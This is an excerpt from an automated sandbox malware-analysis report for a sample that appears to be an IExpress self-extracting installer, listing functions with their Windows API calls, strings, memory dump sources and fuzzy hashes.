                                                                                                                  • Part of subcall function 00007FF6FD2151F8: FreeResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD2152A5
                                                                                                                • LocalAlloc.KERNEL32(?,?,?,?,?,00007FF6FD213261), ref: 00007FF6FD214085
                                                                                                                • LocalFree.KERNEL32 ref: 00007FF6FD214108
                                                                                                                  • Part of subcall function 00007FF6FD214F2C: LoadStringA.USER32 ref: 00007FF6FD214FBC
                                                                                                                  • Part of subcall function 00007FF6FD214F2C: MessageBoxA.USER32 ref: 00007FF6FD214FFC
                                                                                                                  • Part of subcall function 00007FF6FD217958: GetLastError.KERNEL32 ref: 00007FF6FD21795C
                                                                                                                • lstrcmpA.KERNEL32(?,?,?,?,?,00007FF6FD213261), ref: 00007FF6FD21412E
                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,00007FF6FD213261), ref: 00007FF6FD21418F
                                                                                                                  • Part of subcall function 00007FF6FD217D28: FindResourceA.KERNEL32 ref: 00007FF6FD217D52
                                                                                                                  • Part of subcall function 00007FF6FD217D28: LoadResource.KERNEL32 ref: 00007FF6FD217D69
                                                                                                                  • Part of subcall function 00007FF6FD217D28: DialogBoxIndirectParamA.USER32 ref: 00007FF6FD217D9F
                                                                                                                  • Part of subcall function 00007FF6FD217D28: FreeResource.KERNEL32 ref: 00007FF6FD217DB1
                                                                                                                • LocalFree.KERNEL32 ref: 00007FF6FD214168
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                • String ID: <None>$LICENSE
                                                                                                                • API String ID: 2414642746-383193767
                                                                                                                • Opcode ID: 1c43a6c209edff215d2b42a35ca82b93fc35595726ea4f293da311bf4292f90f
                                                                                                                • Instruction ID: 3071374a43778f3234a3f4ebcc92f8ff374517786043c61a5416568756b73424
                                                                                                                • Opcode Fuzzy Hash: 1c43a6c209edff215d2b42a35ca82b93fc35595726ea4f293da311bf4292f90f
                                                                                                                • Instruction Fuzzy Hash: CA310331A19616CAE7209B20EA5177A6A60EB89749F44C535DA2DC76D0FF7EF0058AC0
                                                                                                                Function 00007FF6FD217984 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6FD21625F), ref: 00007FF6FD2179BB
                                                                                                                • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6FD21625F), ref: 00007FF6FD2179CA
                                                                                                                • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6FD21625F), ref: 00007FF6FD217A1A
                                                                                                                • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6FD21625F), ref: 00007FF6FD217A4E
                                                                                                                • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6FD21625F), ref: 00007FF6FD217A67
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$Free$FindLoadLock
                                                                                                                • String ID: UPDFILE%lu
                                                                                                                • API String ID: 3629466761-2329316264
                                                                                                                • Opcode ID: 912f736fff6cc648edac57934596fe713f99585f0c6d65f4e9552fedd6e4e983
                                                                                                                • Instruction ID: 7ab261a833e17306512e920714a025f8c972c14ee33504a540a4b6e857c0699a
                                                                                                                • Opcode Fuzzy Hash: 912f736fff6cc648edac57934596fe713f99585f0c6d65f4e9552fedd6e4e983
                                                                                                                • Instruction Fuzzy Hash: A8315E32A08A41C6E7108B25A50017ABAA0FBC9B54F558235DB6EC33D5FF3EF504C6C0
                                                                                                                Function 00007FF6FD2151F8 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 3370778649-0
                                                                                                                • Opcode ID: 2722992ef715b720f40bc041322e554c29a54f2f23c26d5441508fe68943f667
                                                                                                                • Instruction ID: b78deef8c9c61cd74503338141bc24d4d85a6db4edf5f957bfef6a4a468d2da9
                                                                                                                • Opcode Fuzzy Hash: 2722992ef715b720f40bc041322e554c29a54f2f23c26d5441508fe68943f667
                                                                                                                • Instruction Fuzzy Hash: 0B111D31B09B4187E7145B62A60407DAAA0EB4EFC1F48D474DE2EC3794FF3EE4418680
                                                                                                                Function 00007FF6FD212234 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                • String ID: wininit.ini
                                                                                                                • API String ID: 3273605193-4206010578
                                                                                                                • Opcode ID: 272abce5711e61987618d7fa9275a95ad876e249e85b0132ec51f4cc75ec81ca
                                                                                                                • Instruction ID: 4a1e9c4b4f93cd371ee1e6b5c07ded06af66314c8b125d5694a896128dc4e3c5
                                                                                                                • Opcode Fuzzy Hash: 272abce5711e61987618d7fa9275a95ad876e249e85b0132ec51f4cc75ec81ca
                                                                                                                • Instruction Fuzzy Hash: 5D113032604A8187E7108B25E5542AAB6A1FBCD715F85C131DB6EC3694FF3DE549CA80
                                                                                                                Function 00007FF6FD21397E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Text$DesktopDialogForegroundItem
                                                                                                                • String ID: 124
                                                                                                                • API String ID: 761066910-372045425
                                                                                                                • Opcode ID: f21d8755046b2bff5672eb5e92626a0ccf9070bb66767417a7c329f8521aba4d
                                                                                                                • Instruction ID: 24afc74338f338982d22bc8100adda619fdcb78741f61e795a8cee7951d38b22
                                                                                                                • Opcode Fuzzy Hash: f21d8755046b2bff5672eb5e92626a0ccf9070bb66767417a7c329f8521aba4d
                                                                                                                • Instruction Fuzzy Hash: 10113070D08642D6FB142B61AA443B96A52FB8AB41F84D170CA2ED23D4FF7EB44987C0
                                                                                                                Function 00007FF6FD214A54 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 55memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215220
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: SizeofResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215231
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215257
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: LoadResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215268
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: LockResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215277
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: memcpy_s.MSVCRT ref: 00007FF6FD215296
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: FreeResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD2152A5
                                                                                                                • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF6FD2134BA), ref: 00007FF6FD214A7D
                                                                                                                • LocalFree.KERNEL32(?,?,?,?,00000000,00007FF6FD2134BA), ref: 00007FF6FD214B19
                                                                                                                  • Part of subcall function 00007FF6FD214F2C: LoadStringA.USER32 ref: 00007FF6FD214FBC
                                                                                                                  • Part of subcall function 00007FF6FD214F2C: MessageBoxA.USER32 ref: 00007FF6FD214FFC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                • String ID: <None>$@$FINISHMSG
                                                                                                                • API String ID: 3507850446-4126004490
                                                                                                                • Opcode ID: 1d4e6bd0a63b8b8b494048026c3f832f350be4f10dc00f629820bf4d9c538aed
                                                                                                                • Instruction ID: aaaab546ba099eb8c4903210af40bcd0e58eaf387ac6d06072b0b2a65819927e
                                                                                                                • Opcode Fuzzy Hash: 1d4e6bd0a63b8b8b494048026c3f832f350be4f10dc00f629820bf4d9c538aed
                                                                                                                • Instruction Fuzzy Hash: 6E119F72A0824287F7208B20A55077A76A0EB89789F44D135DF6DC6BC4FF3EE1058BC0
                                                                                                                Function 00007FF6FD217C50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$AttributesFile
                                                                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                                                • API String ID: 438848745-726598030
                                                                                                                • Opcode ID: 49ff66dd0027909a7b800612d590b018d10ed512dde88fa856883505687205f1
                                                                                                                • Instruction ID: fe53a38b56a4982062a85bb0d2f6ee42f0b97a4cee2fa26bd6a30a5ad7a459ea
                                                                                                                • Opcode Fuzzy Hash: 49ff66dd0027909a7b800612d590b018d10ed512dde88fa856883505687205f1
                                                                                                                • Instruction Fuzzy Hash: A0113E31A18686D5EB618B24E5502F977A0FB99714F848231C76DC36D2FF2EE609C7C0
                                                                                                                Function 00007FF6FD21146E Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1273765764-0
                                                                                                                • Opcode ID: 779d4c80867048ee85b76de8b865dc8d6e9560f81da083dc2e25c0ec5bc041cf
                                                                                                                • Instruction ID: cb69e92f4ffe6f2378bf1f78a9d1bc4649536b80762d10a5db4c5ec55a68858a
                                                                                                                • Opcode Fuzzy Hash: 779d4c80867048ee85b76de8b865dc8d6e9560f81da083dc2e25c0ec5bc041cf
                                                                                                                • Instruction Fuzzy Hash: 2D116332A08A8596E7105B61B5443B9A760FB89B65F448231CB7EC73C5FF3DE14587C0
                                                                                                                Function 00007FF6FD213D34 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 220windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$BeepVersion
                                                                                                                • String ID: 124
                                                                                                                • API String ID: 2519184315-372045425
                                                                                                                • Opcode ID: cd403af55b8476f266db926376131480319a2a35561f0b0250f12cd9deded584
                                                                                                                • Instruction ID: f3451de15f7164c6b40fd653850f716be23bd5e70c5cedb6b60b81757f5bee29
                                                                                                                • Opcode Fuzzy Hash: cd403af55b8476f266db926376131480319a2a35561f0b0250f12cd9deded584
                                                                                                                • Instruction Fuzzy Hash: 6F919E72A1865386FB64AF15968067966A2BF44794F208135DB7ED32D0FE3FF84287C0
                                                                                                                Function 00007FF6FD217B0F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseCreateHandleWrite
                                                                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                                                                • API String ID: 1065093856-1955631000
                                                                                                                • Opcode ID: e045f108fcc8068e113ee9e0e4cf638292a1811dea5a3a985454c52ef67f7177
                                                                                                                • Instruction ID: 3c06a8285dafba079cc6586af1916eec6ca67097de206e0a4bbd95a7335541d6
                                                                                                                • Opcode Fuzzy Hash: e045f108fcc8068e113ee9e0e4cf638292a1811dea5a3a985454c52ef67f7177
                                                                                                                • Instruction Fuzzy Hash: 23315022608681C6EB518F10E5407AAB760FB89794F448235DB6D877D5EF7DE504C790
                                                                                                                Function 00007FF6FD215E44 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: *MEMCAB
                                                                                                                • API String ID: 0-3211172518
                                                                                                                • Opcode ID: 8f0ecc18e58d69be0ff920eef984cb1b5456fa5790288b24a30beba8d1cf7dc7
                                                                                                                • Instruction ID: c2ed2027e950fe136a45a662d119919058beb44172d0698b40f836aa7468d68f
                                                                                                                • Opcode Fuzzy Hash: 8f0ecc18e58d69be0ff920eef984cb1b5456fa5790288b24a30beba8d1cf7dc7
                                                                                                                • Instruction Fuzzy Hash: BA31E921A09A4285EB518B14E6443A973B4BB49790F9582B5DA7DC27E0FF3EF484C7C0
                                                                                                                Function 00007FF6FD212308 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00007FF6FD21232B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseInfoOpenQuery
                                                                                                                • String ID: System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                • API String ID: 2142960691-1430103811
                                                                                                                • Opcode ID: ffb65070036c0e638a3fb9cad9fcb0c30fa5a0b7ad628ef0fdab3ccaafb5356a
                                                                                                                • Instruction ID: 97cad803f8f29730ff043baf025134b7c53be903b613d5d262bba1f89dd393de
                                                                                                                • Opcode Fuzzy Hash: ffb65070036c0e638a3fb9cad9fcb0c30fa5a0b7ad628ef0fdab3ccaafb5356a
                                                                                                                • Instruction Fuzzy Hash: 75111932618B8087E7108F29F44452AFBE4F7C9754B549228EB9982B68EF38D0548F40
                                                                                                                Function 00007FF6FD2186F0 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                • String ID:
                                                                                                                • API String ID: 140117192-0
                                                                                                                • Opcode ID: 31029eafa361a8816cb3b7c2e50cea46018a43ad4d194b63bd7ab82f81b508e1
                                                                                                                • Instruction ID: 61fe444f5196c64f2c01229018644b198a17ec54a2b2c7a18cb244301aee5244
                                                                                                                • Opcode Fuzzy Hash: 31029eafa361a8816cb3b7c2e50cea46018a43ad4d194b63bd7ab82f81b508e1
                                                                                                                • Instruction Fuzzy Hash: 1C41C639A08B0281EB108B18F990369B364FB84784F608136DAADC27A4FF3EE555D7C0
                                                                                                                Function 00007FF6FD21845E Relevance: 6.1, APIs: 4, Instructions: 71sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_cexit_inittermexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 642454821-0
                                                                                                                • Opcode ID: 09076979b3e96fc5e14e933eaad3d45af6720b0af7fabc4f9cac535cb861094d
                                                                                                                • Instruction ID: a378257c1682d904783f6ed54b909e5b67f814f2a31de176103396020383b007
                                                                                                                • Opcode Fuzzy Hash: 09076979b3e96fc5e14e933eaad3d45af6720b0af7fabc4f9cac535cb861094d
                                                                                                                • Instruction Fuzzy Hash: C5315C3690C646A6E7108B24EA9037AA3A0FB44394F558435DB6DC32E1FF2FF55096C0
                                                                                                                Function 00007FF6FD21874B Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                • String ID:
                                                                                                                • API String ID: 140117192-0
                                                                                                                • Opcode ID: 4090816444ccd06f36d04890147d9874dc88da504e5caf5353b8954b97740e78
                                                                                                                • Instruction ID: f33f07dc21cde1c33e8728a7b18b700f6b95509ac633613671e798b054c52107
                                                                                                                • Opcode Fuzzy Hash: 4090816444ccd06f36d04890147d9874dc88da504e5caf5353b8954b97740e78
                                                                                                                • Instruction Fuzzy Hash: 4C31D879608B4182EB108B58F590369B364FB88744F648136DAADC37A4FF3EE549D7C0
                                                                                                                Function 00007FF6FD217D28 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$DialogFindFreeIndirectLoadParam
